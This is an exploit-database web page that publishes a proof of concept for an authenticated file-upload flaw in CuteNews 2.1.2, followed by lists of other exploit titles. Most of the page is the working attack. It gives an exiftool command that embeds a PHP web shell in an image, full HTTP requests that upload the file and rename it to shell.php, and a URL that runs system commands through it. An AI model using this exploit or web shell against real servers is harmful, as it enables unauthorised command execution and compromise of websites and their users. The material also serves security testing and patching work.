Search for hundreds of thousands of exploits

"CuteNews 2.1.2 - Authenticated Arbitrary File Upload"

Author

Exploit author

"Nhat Ha"

Platform

Exploit platform

php

Release date

Exploit published date

2020-05-12

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
# Exploit Title: CuteNews 2.1.2 - Authenticated Arbitrary File Upload
# Date: 2020-05-12
# Author: Vigov5 - SunCSR Team
# Vendor Homepage: https://cutephp.com
# Software Link: https://cutephp.com/click.php?cutenews_latest
# Version: v2.1.2
# Tested on: Ubuntu 18.04 / Kali Linux

Description:
------------------------------------------------------------------------
In the "Media Manager" area, Users with low privileges (Editor) can bypass
file upload restrictions, resulting in arbitrary command execution.


[PoC]
--------------------------------------------------------------------------------

# Step 1. Create shell  $ exiftool -Comment='<?php echo "<pre>";
system($_GET['cmd']); ?>' shell.png;
# Step 2. Upload Shell (# Minimum editor privileges)

POST /CuteNews/index.php HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101
Firefox/76.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------15868731501112834542363527723
Content-Length: 3775
Origin: [target]
DNT: 1
Connection: close
Referer: [target]/CuteNews/index.php
Cookie: CUTENEWS_SESSION=k4rgekaj68tr9ln8j0jlme7e7h
Upgrade-Insecure-Requests: 1

-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="mod"

media
-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="opt"

media
-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="folder"


-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="CKEditorFuncNum"


-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="callback"


-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="style"


-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="faddm"


-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="imgopts"


-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="__signature_key"

7ffa4c94a150c20f0c1b51036f6e4597-editor
-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="__signature_dsi"

48d87ded04d15407f258c57efa3216e8
-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="upload_from_inet"


-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="upload_file[]"; filename="shell.png"
Content-Type: image/png

[Content Image Here ! ]
-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="upload"

Upload file(s)
-----------------------------15868731501112834542363527723--

# Step 3. Change filename shell.jpg to shell.php

POST /CuteNews/index.php HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101
Firefox/76.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 241
Origin: [target]
DNT: 1
Connection: close
Referer: http://[target]CuteNews/index.php
Cookie: CUTENEWS_SESSION=k4rgekaj68tr9ln8j0jlme7e7h
Upgrade-Insecure-Requests: 1

mod=media&opt=media&folder=&CKEditorFuncNum=&callback=&style=&faddm=&imgopts=&__signature_key=ebdaf403dcda492fabe8f1d96399b16b-editor&__signature_dsi=27a9035f2b130dd1477ad2a37a5721da&pending=rename&ids%5B0%5D=shell.png&place%5B0%5D=shell.php

# Step 4. Execute the command with the path : http://
[target]/CuteNews/uploads/shell.php?cmd=id
Release DateTitleTypePlatformAuthor
2020-07-02"WhatsApp Remote Code Execution - Paper"webappsandroid"ashu Jaiswal"
2020-07-02"ZenTao Pro 8.8.2 - Command Injection"webappsphp"Daniel Monzón"
2020-07-02"OCS Inventory NG 2.7 - Remote Code Execution"webappsmultipleAskar
2020-07-01"Online Shopping Portal 3.1 - Authentication Bypass"webappsphp"Ümit Yalçın"
2020-07-01"e-learning Php Script 0.1.0 - 'search' SQL Injection"webappsphpKeopssGroup0day_Inc
2020-07-01"PHP-Fusion 9.03.60 - PHP Object Injection"webappsphpcoiffeur
2020-07-01"RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)"localwindows"Paras Bhatia"
2020-06-30"Reside Property Management 3.0 - 'profile' SQL Injection"webappsphp"Behzad Khalifeh"
2020-06-30"Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting"webappsphp"Anushree Priyadarshini"
2020-06-26"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path"localwindows"Ethan Seow"
Release DateTitleTypePlatformAuthor
2020-07-02"ZenTao Pro 8.8.2 - Command Injection"webappsphp"Daniel Monzón"
2020-07-01"Online Shopping Portal 3.1 - Authentication Bypass"webappsphp"Ümit Yalçın"
2020-07-01"e-learning Php Script 0.1.0 - 'search' SQL Injection"webappsphpKeopssGroup0day_Inc
2020-07-01"PHP-Fusion 9.03.60 - PHP Object Injection"webappsphpcoiffeur
2020-06-30"Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting"webappsphp"Anushree Priyadarshini"
2020-06-30"Reside Property Management 3.0 - 'profile' SQL Injection"webappsphp"Behzad Khalifeh"
2020-06-26"OpenEMR 5.0.1 - 'controller' Remote Code Execution"webappsphp"Emre ÖVÜNÇ"
2020-06-25"FHEM 6.0 - Local File Inclusion"webappsphp"Emre ÖVÜNÇ"
2020-06-23"Responsive Online Blog 1.0 - 'id' SQL Injection"webappsphp"Eren Şimşek"
2020-06-23"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)"webappsphpBKpatron
Release DateTitleTypePlatformAuthor
2020-05-12"CuteNews 2.1.2 - Authenticated Arbitrary File Upload"webappsphp"Nhat Ha"
2020-05-11"Kartris 1.6 - Arbitrary File Upload"webappsaspx"Nhat Ha"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48458/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.